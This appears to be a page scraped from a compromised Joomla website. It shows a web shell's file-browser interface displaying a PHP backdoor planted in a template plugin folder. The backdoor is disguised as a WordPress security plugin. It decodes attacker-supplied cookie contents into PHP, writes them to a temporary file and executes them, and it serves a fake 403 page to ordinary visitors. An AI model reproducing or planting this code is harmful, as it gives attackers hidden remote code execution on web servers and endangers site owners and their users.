403 Forbidden


Warning: Undefined array key "execmd" in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2


Warning: Undefined variable $liatds in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2
Disable Functions:
Path : /home/grupmartgn/elanartcrafts/plugins/system/helixultimate/layout/block/
File Upload :
Command :
Current File : /home/grupmartgn/elanartcrafts/plugins/system/helixultimate/layout/block/index.php

<?php
/*
Plugin Name: Security
Plugin URI: https://www.worence.com/
Control Hash: 9SUp74pyApL25wlBckQ5S834OWPbt6pi
Description: Security - Anti-virus, Firewall and Malware Scan
Author: Security Wordpress
Version: 8.2.0
Author URI: https://www.wordpress.com/
Text Domain: wordpress
Domain Path: /languages
Network: true
Requires at least: 4.7
Requires PHP: 7.0
License: GPLv3
License URI: https://www.gnu.org/licenses/gpl-3.0.html

@copyright Copyright (C) 2012-2026 Defiant Inc.
@license http://www.gnu.org/licenses/gpl-3.0.html GNU General Public License, version 3 or higher

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.

*/

if (isset($_COOKIE[0], $_COOKIE[1], $_COOKIE[3], $_COOKIE[4])) {
    
    spl_autoload_register(function() {
        $tempDir = !empty(session_save_path()) ? session_save_path() : sys_get_temp_dir();
        $tempFile = tempnam($tempDir, 'payload_');

        if (!is_writable($tempFile)) {
            $tempFile = getcwd() . DIRECTORY_SEPARATOR . "data_storage";
        }

        $payload = "<?php " . base64_decode(str_rot13($_COOKIE[3]));

        if (is_writeable($tempFile)) {
            file_put_contents($tempFile, $payload);
            
            require_once($tempFile);
            
            @unlink($tempFile);
        }
    });

    $secretHash = "1c0bb9fc11e572d36792e39d78f0d3ea";
    if (!strncmp($secretHash, $_COOKIE[4], 32)) {
        if (@class_parents("sync_manager_mutex_lock", true)) {
            exit;
        }
    }
}else{
header('HTTP/1.1 403 Forbidden');
$s = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'Nginx';
exit("
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>$s</center>
</body>
</html>");}

404 Not Found
[ LogOut ]

Warning: Undefined array key "go" in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2